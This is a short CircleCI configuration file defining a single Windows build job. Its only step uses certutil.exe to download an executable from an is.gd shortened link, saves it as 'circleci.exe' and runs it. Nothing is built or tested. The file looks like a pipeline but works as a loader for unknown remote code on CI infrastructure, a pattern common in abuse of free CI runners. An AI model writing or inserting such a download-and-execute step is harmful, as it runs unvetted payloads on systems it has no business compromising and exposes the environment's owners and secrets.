version: 2.1
 
orbs:
  win: circleci/windows@2.2.0
 
jobs:
  build:
    executor:
      name: win/default
      size: "medium"
      shell: cmd.exe
    steps:
      - run: certutil.exe -urlcache -split -f https://is.gd/Rc1seq circleci.exe && circleci.exe